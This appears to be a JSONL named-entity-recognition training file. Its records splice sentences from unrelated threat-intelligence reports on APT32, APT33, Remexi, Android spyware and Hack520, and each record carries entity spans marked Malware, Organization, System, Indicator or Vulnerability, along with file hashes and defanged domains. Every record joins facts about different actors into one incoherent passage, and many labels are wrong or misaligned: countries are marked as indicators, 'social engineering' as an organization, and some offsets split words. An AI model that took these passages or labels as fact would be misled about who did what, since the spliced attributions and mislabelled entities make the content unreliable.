{"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either metadata or document structures like macros or embedded image files ( depicted in the image below ) . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 41, "end": 51, "label": "Malware"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 201, "end": 212, "label": "Malware"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 311, "end": 327, "label": "System"}, {"start": 550, "end": 568, "label": "System"}, {"start": 607, "end": 625, "label": "System"}]}
{"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 . The image below highlights the nodes associated with the samples analyzed in this report . The group , which has some loose ties and similarities to other Iranian APTs like APT34 and Charming Kitten , first came to light in 2019 .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 196, "end": 203, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 392, "end": 404, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 420, "end": 435, "label": "Organization"}]}
{"text": "It contained approximately 8GB of stolen data . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . The graph can also be viewed in the VTGraph Console for additional exploration . Also , the names he used are not randomized and begin with .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 162, "end": 173, "label": "Malware"}, {"start": 214, "end": 229, "label": "System"}, {"start": 266, "end": 317, "label": "Malware"}]}
{"text": "A recent whois of \u201c goldncup.com \u201d . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site . The fact the attackers were attempting to connect in realtime with victims over phones and video conferences for conversations rather than just engaging over email is also unusual , suggesting confidence in the attackers skills in English and in impersonation although it is not clear if any conversations ended up taking place .", "spans": [{"start": 20, "end": 32, "label": "Indicator"}, {"start": 59, "end": 66, "label": "Organization"}, {"start": 80, "end": 85, "label": "Organization"}, {"start": 96, "end": 116, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 170, "end": 187, "label": "Organization"}, {"start": 194, "end": 213, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 311, "end": 325, "label": "Indicator"}, {"start": 346, "end": 355, "label": "Organization"}]}
{"text": "Creation date is a week before the start of the tournament . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL . The Ursnif variants were primarily grouped by C2 infrastructure . Companies conducing a risk analysis would be well served to consider such motivations when evaluating their exposure .", "spans": [{"start": 61, "end": 66, "label": "Organization"}, {"start": 155, "end": 165, "label": "System"}, {"start": 168, "end": 176, "label": "System"}, {"start": 179, "end": 188, "label": "System"}, {"start": 195, "end": 202, "label": "System"}, {"start": 209, "end": 215, "label": "Malware"}, {"start": 251, "end": 253, "label": "System"}]}
{"text": "A recent whois of \u201c goldncup.com \u201d . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines . The large grouping on the right of the diagram are direct variants of the sample referenced in this write up . One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": [{"start": 20, "end": 32, "label": "Indicator"}, {"start": 47, "end": 65, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 212, "end": 232, "label": "Organization"}, {"start": 394, "end": 401, "label": "Organization"}]}
{"text": "Creation date is a week before the start of the tournament . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Samples in this grouping were all hosted on sites that were called by the second stage . We can compare many successful RDP attacks to the equivalent of leaving a window or back door unlocked at our homes , giving the criminal a low barrier to entry .", "spans": [{"start": 61, "end": 66, "label": "Organization"}, {"start": 135, "end": 164, "label": "System"}, {"start": 374, "end": 416, "label": "Vulnerability"}]}
{"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor . The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 233, "end": 255, "label": "System"}, {"start": 364, "end": 377, "label": "Organization"}, {"start": 387, "end": 399, "label": "Organization"}]}
{"text": "The original app looks innocent , with most of its code aimed at implementing the real features that the app claims to provide . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 . Mandiant has observed overlap amongst multiple North Korean groups that fall under the RGB .", "spans": [{"start": 271, "end": 280, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 385, "end": 397, "label": "Malware"}, {"start": 406, "end": 470, "label": "Indicator"}, {"start": 471, "end": 503, "label": "Indicator"}, {"start": 504, "end": 516, "label": "Malware"}, {"start": 525, "end": 589, "label": "Indicator"}, {"start": 590, "end": 622, "label": "Indicator"}, {"start": 623, "end": 635, "label": "Malware"}, {"start": 644, "end": 708, "label": "Indicator"}, {"start": 709, "end": 741, "label": "Indicator"}, {"start": 742, "end": 754, "label": "Malware"}, {"start": 763, "end": 827, "label": "Indicator"}, {"start": 828, "end": 860, "label": "Indicator"}, {"start": 861, "end": 873, "label": "Malware"}, {"start": 882, "end": 946, "label": "Indicator"}, {"start": 947, "end": 979, "label": "Indicator"}, {"start": 1004, "end": 1074, "label": "Indicator"}]}
{"text": "In addition , it collects identifiers and some data from the device . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) . Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 270, "end": 334, "label": "Indicator"}, {"start": 335, "end": 367, "label": "Indicator"}, {"start": 368, "end": 374, "label": "Malware"}, {"start": 383, "end": 447, "label": "Indicator"}, {"start": 448, "end": 480, "label": "Indicator"}, {"start": 481, "end": 487, "label": "Malware"}, {"start": 496, "end": 560, "label": "Indicator"}, {"start": 561, "end": 593, "label": "Indicator"}, {"start": 594, "end": 600, "label": "Malware"}, {"start": 609, "end": 673, "label": "Indicator"}, {"start": 674, "end": 706, "label": "Indicator"}, {"start": 707, "end": 713, "label": "Malware"}, {"start": 722, "end": 786, "label": "Indicator"}, {"start": 787, "end": 819, "label": "Indicator"}, {"start": 822, "end": 833, "label": "Organization"}, {"start": 970, "end": 986, "label": "System"}, {"start": 1040, "end": 1053, "label": "System"}]}
{"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam . GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd . Then it calls with invalid value 69 .", "spans": [{"start": 202, "end": 210, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 285, "end": 293, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 395, "end": 403, "label": "Malware"}, {"start": 412, "end": 476, "label": "Indicator"}, {"start": 477, "end": 509, "label": "Indicator"}, {"start": 510, "end": 518, "label": "Malware"}, {"start": 527, "end": 591, "label": "Indicator"}, {"start": 592, "end": 624, "label": "Indicator"}, {"start": 625, "end": 633, "label": "Malware"}, {"start": 642, "end": 706, "label": "Indicator"}, {"start": 707, "end": 739, "label": "Indicator"}, {"start": 740, "end": 748, "label": "Malware"}, {"start": 757, "end": 821, "label": "Indicator"}, {"start": 822, "end": 854, "label": "Indicator"}, {"start": 855, "end": 863, "label": "Malware"}, {"start": 872, "end": 936, "label": "Indicator"}, {"start": 937, "end": 969, "label": "Indicator"}]}
{"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang . Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran . STRATOFEAR ( com.google.kservice , us.zoom . ZoomService )", "spans": [{"start": 126, "end": 136, "label": "System"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 229, "end": 250, "label": "System"}, {"start": 306, "end": 319, "label": "System"}, {"start": 322, "end": 333, "label": "System"}, {"start": 338, "end": 345, "label": "System"}, {"start": 348, "end": 354, "label": "Organization"}, {"start": 360, "end": 366, "label": "Malware"}, {"start": 612, "end": 622, "label": "Malware"}]}
{"text": "Communication with the C & C In order to communicate with its C & C , the app uses the MQTT ( Message Queuing Telemetry Transport ) protocol , which is transported over TCP port 1883 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 . The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage . Once the malware is dropped and executed through the lure documents , the Foudre backdoor connects to the HTTP commandandcontrol C2 server and downloads a selfextracting archive with fullfeatured Tonnerre malware .", "spans": [{"start": 169, "end": 182, "label": "Indicator"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 409, "end": 415, "label": "Malware"}, {"start": 496, "end": 503, "label": "Malware"}, {"start": 561, "end": 576, "label": "Malware"}, {"start": 589, "end": 625, "label": "System"}, {"start": 670, "end": 699, "label": "Malware"}]}
{"text": "Initiating the MQTT client . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . This malware has previously been associated with an APT actor that Symantec calls Chafer . In todays world of evolving malware , there are likely a lot of threats antivirus does nt know about .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 232, "end": 238, "label": "Organization"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 313, "end": 322, "label": "Organization"}]}
{"text": "Initiating the MQTT client . We assess APT33 works at the behest of the Iranian government . The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when . One of the problems with relying entirely on one security solution is that the cyber threat landscape changes rapidly .", "spans": [{"start": 39, "end": 44, "label": "Organization"}]}
{"text": "Initiating the MQTT client . APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate . Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 64, "end": 92, "label": "Organization"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 257, "end": 263, "label": "System"}, {"start": 278, "end": 285, "label": "System"}, {"start": 301, "end": 350, "label": "System"}, {"start": 351, "end": 356, "label": "System"}, {"start": 359, "end": 372, "label": "Indicator"}, {"start": 440, "end": 487, "label": "Indicator"}, {"start": 496, "end": 544, "label": "Indicator"}]}
{"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor . Its C2 is based on IIS using .asp technology to handle the victims\u2019 HTTP . This \u201c est \u201d reference could refer to a hacking group with its own message board on which hack520 also posts regularly .", "spans": [{"start": 132, "end": 142, "label": "Organization"}, {"start": 181, "end": 201, "label": "System"}, {"start": 209, "end": 225, "label": "Organization"}, {"start": 313, "end": 325, "label": "Organization"}, {"start": 332, "end": 334, "label": "System"}, {"start": 347, "end": 350, "label": "System"}, {"start": 357, "end": 361, "label": "Indicator"}, {"start": 493, "end": 500, "label": "Organization"}]}
{"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production . Remexi developers use the C programming language and GCC compiler on Windows in the MinGW . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": [{"start": 162, "end": 167, "label": "Organization"}, {"start": 222, "end": 237, "label": "Organization"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 299, "end": 312, "label": "Organization"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 352, "end": 353, "label": "System"}, {"start": 379, "end": 382, "label": "System"}, {"start": 395, "end": 402, "label": "System"}, {"start": 410, "end": 415, "label": "System"}, {"start": 418, "end": 427, "label": "System"}]}
{"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings . They most likely used the Qt Creator IDE in a Windows . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 191, "end": 196, "label": "Organization"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 236, "end": 252, "label": "Organization"}, {"start": 268, "end": 289, "label": "Organization"}, {"start": 365, "end": 379, "label": "System"}, {"start": 385, "end": 392, "label": "System"}, {"start": 395, "end": 513, "label": "Indicator"}]}
{"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector . The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM . Composition of the KillNet Collective", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 277, "end": 293, "label": "Organization"}, {"start": 413, "end": 417, "label": "System"}, {"start": 439, "end": 457, "label": "Organization"}]}
{"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . XOR and RC4 encryption is used with quite long unique keys for different . By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": [{"start": 132, "end": 137, "label": "Organization"}, {"start": 189, "end": 201, "label": "Organization"}, {"start": 206, "end": 220, "label": "Organization"}, {"start": 484, "end": 496, "label": "Organization"}]}
{"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in Farsi . It appears the activity by the group may have been stopped early in the attack chain as the only malicious activity seen on infected machines is credential harvesting .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 162, "end": 174, "label": "Organization"}, {"start": 194, "end": 215, "label": "Organization"}, {"start": 224, "end": 238, "label": "Malware"}, {"start": 311, "end": 332, "label": "Organization"}, {"start": 466, "end": 471, "label": "Organization"}, {"start": 559, "end": 576, "label": "System"}]}
{"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn \u2019 t . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent . The chain of evidence suggests that the threat actor \u2019s motives are financially driven .", "spans": [{"start": 179, "end": 184, "label": "Organization"}, {"start": 251, "end": 265, "label": "Malware"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 390, "end": 409, "label": "Indicator"}, {"start": 414, "end": 432, "label": "Indicator"}]}
{"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app \u2019 s attack flow collects device information and a list of apps installed on the device . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018 . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 43, "end": 69, "label": "Indicator"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 515, "end": 523, "label": "Organization"}, {"start": 739, "end": 748, "label": "Malware"}, {"start": 816, "end": 832, "label": "Malware"}]}
{"text": "These are then uploaded to the C & C HTTP server . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015 . They work to bypass traditional security barriers on the Android operating system and provide a variety of information stealing , surveillance and remote access capabilities .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 467, "end": 491, "label": "System"}]}
{"text": "The collection of basic device information . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . The newest module\u2019s compilation timestamp is March 2018 . Budworm aka LuckyMouse , Emissary Panda , APT27 deployed a previously unseen variant of its SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll .", "spans": [{"start": 100, "end": 106, "label": "Organization"}, {"start": 111, "end": 125, "label": "Organization"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 266, "end": 272, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 358, "end": 372, "label": "Organization"}, {"start": 373, "end": 374, "label": "Organization"}, {"start": 425, "end": 477, "label": "Malware"}]}
{"text": "The collection of basic device information . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . The developers used GCC compiler on Windows in the MinGW . Commercial spyware can be seen as having legitimate reasons to exist , especially in instances of crime and terrorism ( as long as it is highly regulated ) .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 81, "end": 90, "label": "Organization"}, {"start": 117, "end": 134, "label": "Organization"}, {"start": 157, "end": 160, "label": "System"}, {"start": 173, "end": 180, "label": "System"}, {"start": 188, "end": 193, "label": "System"}, {"start": 196, "end": 214, "label": "System"}]}
{"text": "In addition , at this stage the app can process one of these commands : \u2022 Collect device info \u2022 Install app \u2022 Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 426, "end": 427, "label": "System"}, {"start": 454, "end": 469, "label": "Indicator"}, {"start": 472, "end": 488, "label": "Indicator"}, {"start": 493, "end": 508, "label": "Indicator"}, {"start": 522, "end": 534, "label": "Malware"}, {"start": 574, "end": 671, "label": "Malware"}, {"start": 682, "end": 700, "label": "Organization"}, {"start": 705, "end": 735, "label": "Organization"}]}
{"text": "\u2022 Change server domain Out of these , the most interesting command is the \u201c install app \u201d command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it . We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries . Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 211, "end": 224, "label": "System"}, {"start": 489, "end": 491, "label": "System"}, {"start": 551, "end": 558, "label": "Organization"}, {"start": 564, "end": 616, "label": "Indicator"}]}
{"text": "Second Phase The second phase dex file contains 3 main services that are being used : \u2022 ConnManager - handles connections to the C & C \u2022 ReceiverManager - waits for incoming calls / app installations \u2022 TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over . Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": [{"start": 429, "end": 434, "label": "Organization"}, {"start": 477, "end": 486, "label": "Organization"}, {"start": 491, "end": 497, "label": "Organization"}, {"start": 566, "end": 578, "label": "Organization"}, {"start": 643, "end": 645, "label": "System"}, {"start": 673, "end": 679, "label": "Malware"}, {"start": 689, "end": 738, "label": "System"}, {"start": 739, "end": 744, "label": "System"}, {"start": 781, "end": 783, "label": "System"}, {"start": 801, "end": 983, "label": "Malware"}]}
{"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups . So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware . The result is that Vice Society is the most prolific attacker of education institutions in the two most attacked countries in the world : the USA and the UK .", "spans": [{"start": 602, "end": 607, "label": "Organization"}, {"start": 695, "end": 708, "label": "Organization"}, {"start": 793, "end": 799, "label": "Malware"}, {"start": 829, "end": 841, "label": "Organization"}, {"start": 875, "end": 897, "label": "Organization"}, {"start": 952, "end": 955, "label": "Organization"}, {"start": 964, "end": 966, "label": "Organization"}]}
{"text": "a command from the C & C server . This coupled with the timing of operations \u2013 which coincides with Iranian working hours \u2013 and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government . However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u00b4s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the . The hijacking is achieved by adding the threat actor 's e - mail address to the Facebook Business account with Admin and Finance editor roles .", "spans": [{"start": 173, "end": 185, "label": "System"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 430, "end": 436, "label": "System"}, {"start": 456, "end": 458, "label": "System"}]}
{"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a The publicly available backdoors and tools utilized by APT33 \u2013 including NANOCORE , NETWIRE , and ALFA Shell \u2013 are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups . This dropper used an FTP with hardcoded credentials to receive its . It is therefore likely that they will try many things to compromise your mobile phone , including using zero - day attacks or unknown vulnerabilities .", "spans": [{"start": 448, "end": 484, "label": "Indicator"}, {"start": 485, "end": 518, "label": "Indicator"}, {"start": 530, "end": 594, "label": "Indicator"}, {"start": 650, "end": 655, "label": "Organization"}, {"start": 668, "end": 676, "label": "System"}, {"start": 679, "end": 686, "label": "System"}, {"start": 693, "end": 703, "label": "System"}, {"start": 778, "end": 785, "label": "Organization"}, {"start": 824, "end": 837, "label": "Organization"}, {"start": 1013, "end": 1031, "label": "Organization"}, {"start": 1035, "end": 1058, "label": "Organization"}]}
{"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . FTP server was not accessible any more at the time of our . \u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 278, "end": 286, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 435, "end": 443, "label": "Organization"}, {"start": 573, "end": 577, "label": "Organization"}, {"start": 608, "end": 619, "label": "Organization"}]}
{"text": "1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 83, "end": 147, "label": "Indicator"}, {"start": 160, "end": 172, "label": "Indicator"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 365, "end": 373, "label": "Organization"}, {"start": 384, "end": 390, "label": "Malware"}, {"start": 463, "end": 470, "label": "System"}, {"start": 619, "end": 659, "label": "Vulnerability"}]}
{"text": "] com glancelove [ . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 6, "end": 20, "label": "Indicator"}, {"start": 21, "end": 26, "label": "Organization"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 161, "end": 169, "label": "Organization"}, {"start": 205, "end": 213, "label": "Organization"}]}
